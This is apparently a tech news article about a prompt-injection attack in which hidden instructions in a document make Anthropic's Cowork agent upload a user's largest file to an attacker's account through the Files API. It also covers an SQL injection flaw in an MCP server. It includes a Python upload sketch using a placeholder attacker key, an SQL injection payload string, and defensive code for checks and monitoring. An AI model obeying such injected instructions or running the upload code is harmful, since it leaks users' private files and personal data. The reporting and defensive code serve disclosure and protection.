
Anthropic’s Files API exfiltration risk resurfaces in Cowork

Hardware Reporter

A prompt injection vulnerability first reported in Claude Code last October has been demonstrated in Anthropic's new Cowork productivity AI, allowing attackers to exfiltrate sensitive files via the Files API without additional user approval. The security firm PromptArmor's proof of concept shows how an attacker could trick Cowork into uploading documents to their own Anthropic account, a risk Anthropic has historically downplayed as a user responsibility.

A security vulnerability first disclosed to Anthropic last October has resurfaced in the company's new Cowork productivity AI, demonstrating a persistent Files API exfiltration risk that the AI lab has repeatedly characterized as a user-side responsibility rather than a platform flaw.


Security firm PromptArmor reported on Wednesday that Cowork, which Anthropic launched as a research preview on Monday, can be manipulated through prompt injection into transmitting sensitive files directly to an attacker's Anthropic account. The attack requires minimal user interaction: the victim only needs to connect Cowork to a local folder holding sensitive information and upload a document that carries a hidden prompt injection. When Cowork analyzes those files, the injected instructions trigger a curl command to Anthropic's file upload API, directing the largest available file to be uploaded under the attacker's API key.
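To make the mechanism concrete, the sketch below shows roughly what that injected upload would look like on the wire, written in Python rather than curl. The endpoint and headers reflect Anthropic's public Files API; the folder path and attacker key are placeholders. The point is that nothing in the request distinguishes it from a legitimate upload except whose key it carries.

```python
import os
import requests

# Illustrative only: roughly the request an injected prompt coaxes the agent
# into issuing. Endpoint and headers reflect Anthropic's public Files API;
# the folder path and attacker key below are placeholders.
ATTACKER_API_KEY = "sk-ant-ATTACKER-PLACEHOLDER"  # attacker's account, not the victim's
CONNECTED_FOLDER = "/path/to/connected/folder"    # folder the victim linked to Cowork

# Locate the largest file in the connected folder, as the PoC's injection requests.
candidates = [
    os.path.join(root, name)
    for root, _, names in os.walk(CONNECTED_FOLDER)
    for name in names
]
largest = max(candidates, key=os.path.getsize)

# Multipart upload to the Files API; from the network's point of view this is
# an ordinary upload, just authenticated with the attacker's key.
with open(largest, "rb") as fh:
    resp = requests.post(
        "https://api.anthropic.com/v1/files",
        headers={
            "x-api-key": ATTACKER_API_KEY,
            "anthropic-version": "2023-06-01",
            "anthropic-beta": "files-api-2025-04-14",
        },
        files={"file": fh},
    )
print(resp.status_code, resp.json().get("id"))  # the file now lives in the attacker's account
```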

PromptArmor demonstrated this with a real estate document, showing how an attacker could subsequently query the exfiltrated file via Claude to retrieve financial information and personally identifiable information (PII) of individuals mentioned in the document. The firm described this as part of an "ever-growing" attack surface, amplified by Cowork's target audience of non-developer office workers who may not consider the security implications of which files and folders they connect to an AI agent.

This attack chain mirrors exactly what security researcher Johann Rehberger reported to Anthropic concerning Claude Code in October 2025. Anthropic's response at the time was notably lukewarm: the company initially closed his bug report, later acknowledged that prompt injection could indeed trick the API into exfiltrating data, and ultimately advised users simply to be careful about what they connect to the bot.

When asked in October whether Anthropic would implement basic safeguards, such as API-side checks to verify that files weren't being transmitted to a different account, the company provided no response. Now, with the same vulnerability appearing in Cowork, its stance remains consistent.
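For illustration only, a safeguard of the kind that question implied might look like the sketch below: a check, at upload time, that an agent-initiated Files API call targets the same account that owns the running session. The types and field names here are hypothetical; Anthropic has not described any such mechanism.

```python
# Hypothetical sketch of an account-matching check for agent-initiated uploads.
# All names and fields are illustrative, not an actual Anthropic mechanism.
from dataclasses import dataclass

@dataclass
class AgentSession:
    org_id: str          # organization that owns the running Cowork session

@dataclass
class UploadRequest:
    api_key_org_id: str  # organization resolved from the API key used for the upload
    filename: str

def allow_upload(session: AgentSession, upload: UploadRequest) -> bool:
    """Permit agent-initiated uploads only when they stay within the same account."""
    return upload.api_key_org_id == session.org_id

# An injected prompt pushing a file to an attacker's key would fail this check.
session = AgentSession(org_id="org_victim")
exfil = UploadRequest(api_key_org_id="org_attacker", filename="deal_terms.pdf")
assert not allow_upload(session, exfil)
```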

In its Cowork announcement, Anthropic acknowledged prompt injection attacks as an issue but framed the risk as an industry-wide challenge for which defenses are still maturing. "We've built sophisticated defenses against prompt injections, but agent safety—that is, the task of securing Claude's real-world actions—is still an active area of development in the industry," the company stated. Anthropic emphasized that these risks aren't new with Cowork, but that the tool represents the first time many users are employing an "agentic" system with capabilities beyond simple conversation.

The company's recommended mitigations place significant responsibility on users: avoid connecting Cowork to sensitive documents, limit its Chrome extension to trusted sites, and monitor for "suspicious actions that may indicate prompt injection." Developer and prompt injection researcher Simon Willison, in his hands-on review of Cowork, criticized this approach as unrealistic for non-technical users. "I do not think it is fair to tell regular non-programmer users to watch out for 'suspicious actions that may indicate prompt injection,'" Willison observed.

This pattern of dismissing reported vulnerabilities as user-manageable risks extends beyond the Files API issue. In June 2025, Trend Micro disclosed that Anthropic's open-source reference SQLite MCP server implementation contained a classic SQL injection flaw. Anthropic declined to patch the issue, arguing the GitHub repository had been archived in May 2025 and was therefore out of scope. The company pointed users to the MCP specification's guidance recommending human oversight for tool invocations.
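The repository's actual code isn't reproduced here, but the flaw class Trend Micro described is the textbook one: user-supplied input spliced directly into a SQL string. A minimal Python sqlite3 illustration of the pattern, alongside the parameterized alternative:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE notes (id INTEGER PRIMARY KEY, owner TEXT, body TEXT)")
conn.execute("INSERT INTO notes (owner, body) VALUES ('alice', 'private'), ('bob', 'secret')")

def notes_for_unsafe(owner: str):
    # The flaw class: input interpolated into the SQL string, so an owner value of
    # "alice' OR '1'='1" rewrites the WHERE clause and returns every row.
    return conn.execute(f"SELECT body FROM notes WHERE owner = '{owner}'").fetchall()

def notes_for_safe(owner: str):
    # Parameterized query: the driver treats the value purely as data.
    return conn.execute("SELECT body FROM notes WHERE owner = ?", (owner,)).fetchall()

print(notes_for_unsafe("alice' OR '1'='1"))  # leaks both rows
print(notes_for_safe("alice' OR '1'='1"))    # returns nothing
```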

This response was particularly concerning given that the vulnerable code had already been forked or copied more than 5,000 times before archiving, meaning the SQL injection vulnerability likely persists across numerous downstream projects. Anthropic disagreed with Trend Micro's analysis and maintained that users should review queries before execution.

The core issue appears to be architectural. Cowork operates as an agentic system with broader access than traditional conversational AI, yet Anthropic's security model seems to treat prompt injection as an inherent limitation of the technology rather than a platform vulnerability requiring mitigation. In its recent statement that it is "working on ways to minimize prompt injections," the company points to Cowork's use of a virtual machine designed to limit access to sensitive files and directories, with further security improvements described as "forthcoming."

However, the fundamental problem remains: once a user grants Cowork access to a folder, the system can be tricked into exfiltrating data without additional approval. The attack doesn't require compromising the user's Anthropic account or gaining additional permissions—it simply exploits the trust relationship between the user and the AI agent.

For homelab builders and security-conscious users evaluating AI tools, this represents a critical consideration. The Files API exfiltration vulnerability demonstrates how AI agents with file system access create new attack vectors that traditional security models don't address. Unlike conventional software where data exfiltration typically requires malware or network compromise, prompt injection allows attackers to manipulate the AI's behavior directly through seemingly legitimate documents.

The practical implications are significant for businesses considering Cowork or similar agentic AI tools. Office workers without security training are unlikely to recognize the risks of connecting sensitive documents to AI agents, particularly when the vendor's own documentation downplays the threat. The attack requires no technical sophistication from the attacker: just a document carrying a hidden prompt injection that triggers when the agent analyzes it.

Anthropic's response highlights a broader industry challenge: as AI systems gain agentic capabilities, the security model must evolve from protecting against external attacks to preventing the AI itself from being manipulated into performing malicious actions. Current approaches, which rely heavily on user caution and "suspicious action" monitoring, appear inadequate for the target audience of productivity tools.

For technical teams evaluating Cowork, the recommendation is clear: treat any AI agent with file system access as a potential exfiltration vector. Implement network-level monitoring for unusual API calls, restrict Cowork to non-sensitive documents in isolated environments, and consider whether the productivity gains justify the security risk. The vulnerability is not theoretical—it's a demonstrated attack chain that Anthropic has known about for months but has not fundamentally addressed.
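What network-level monitoring might look like in practice depends on the egress proxy in use, but the signal is narrow: agent hosts issuing POSTs to Anthropic's Files API endpoint with an API key that isn't one of the organization's own. The sketch below assumes a hypothetical JSON log format and placeholder key identifiers; the field names would need to be adapted to whatever a given proxy actually records.

```python
import json

# Placeholder identifiers for the organization's own API keys, however the proxy labels them.
APPROVED_KEY_IDS = {"sk-ant-api03-ourteam"}

def flag_suspicious(log_line: str) -> bool:
    """Flag Files API uploads that don't use one of our approved API keys."""
    event = json.loads(log_line)
    is_files_upload = (
        event.get("method") == "POST"
        and event.get("host") == "api.anthropic.com"
        and event.get("path", "").startswith("/v1/files")
    )
    key_id = event.get("api_key_id", "")  # assumes the proxy records a key identifier
    return is_files_upload and key_id not in APPROVED_KEY_IDS

sample = '{"method": "POST", "host": "api.anthropic.com", "path": "/v1/files", "api_key_id": "sk-ant-api03-unknown"}'
print(flag_suspicious(sample))  # True: a Files API upload with an unrecognized key
```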

The Cowork research preview is available through Anthropic's platform, but given these security concerns, organizations should carefully evaluate whether to connect it to any production data or sensitive documents until the company implements more robust safeguards against prompt injection-based exfiltration.

For more information on prompt injection vulnerabilities and AI security best practices, see PromptArmor's security research and Johann Rehberger's original Claude Code disclosure. The MCP specification documents the protocol's security recommendations, though these focus on human oversight rather than technical controls.
